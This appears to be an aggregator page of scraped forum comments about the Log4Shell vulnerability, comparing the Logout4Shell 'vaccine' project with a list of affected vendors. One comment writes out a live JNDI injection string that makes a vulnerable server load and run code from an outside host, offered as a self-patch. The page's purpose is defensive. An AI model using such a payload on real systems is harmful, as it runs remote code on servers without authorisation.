Logout4Shell VS Log4jAttackSurface

#1: RCE 0-day exploit found in log4j, a popular Java logging package | 276 comments #2: Godaddy hacked - including admin passwords for both WordPress sites hosted on the platform, as well as passwords for sFTPs, databases and SSL private keys. | 71 comments #3: Log4shell - using the vulnerability to patch the vulnerability - very clever | 64 comments

Hier gibt es eine Impfung gegen Log4Shell. Kein Witz: https://github.com/Cybereason/Logout4Shell

another option : https://github.com/Cybereason/Logout4Shell

Yup

This is actually a thing

We also wrote a Log4Shell payload that will in-memory "hot patch" your server against Log4Shell.

${jndi:ldap://hotpatch.log4shell.com:1389/a}

If you paste that into a vulnerable server (or even throw it into a log statement in your `main` function), that'll patch you against this until you can manage to update properly.

Source code is on GitHub here[0][1] if you want to host it yourself.

(This work is based on Logout4Shell[2], but we rewrote it to fix the bugs, make it work in more places, and also hosted it so that you don't have to muck with DNS and live server stuff.)

0: https://github.com/lunasec-io/lunasec/releases/

1: (Go source code) https://github.com/lunasec-io/lunasec/tree/master/tools/log4...

2: https://github.com/Cybereason/Logout4Shell

The two examples showcase the potential of the RCE. The JNDI endpoint answers with a serialized java class:

a) https://github.com/Cybereason/Logout4Shell where a class is self-healing the log4j vulnerability by reconfiguring it

b) https://twitter.com/marcioalm/status/1470361495405875200 where the payload is opening an application (calculator) on the host system

For those that are interested!

Checkout this link for knowing Log4j impact on manufacturers https://github.com/YfryTchsGD/Log4jAttackSurface

Just look at the currently ongoing insanity that is the log4j exploit, and how one single exploit has lead to a generic attack that can impact tons of companies. Imagine if a state decided to use voting machines, and someone found this style of exploit in the system.

Last week (Dec 9th) a major vulnerability was discovered in an open source logging project for Java called log4j. The vulnerability called Log4Shell would allow anyone to remotely run arbitrary code if they sent a message in the right format to the server. This is one of the worst attacks your system can be susceptible to and if you are interested in the technical details of the problem, here is an overview. The attack surface of Log4Shell is staggering, Amazon, Apple, Google, and the Apache Server are affected; it can almost not get bigger than this. We will see the real fallout of Log4Shell in the next weeks and months as right now servers worldwide are being scanned and prodded for this vulnerability.

Companies should verify they are not running any exposed Log4j Java code.  Here is a list of impacted 3rd party software for your reference.  If you find a server at risk, there are three potential ways to fix it as follows.

Looking for vendors/software on known lists like https://github.com/YfryTchsGD/Log4jAttackSurface

Blender ist nicht betroffen, #42

It does and was also affected by log4j.

Thanks, sure it isn't complete but it does contain some scary and surprising (at least when first reading, of course the really aren't) things like: https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/UniFi.md

Apparently there's proof Steam along with many others are vulnerable.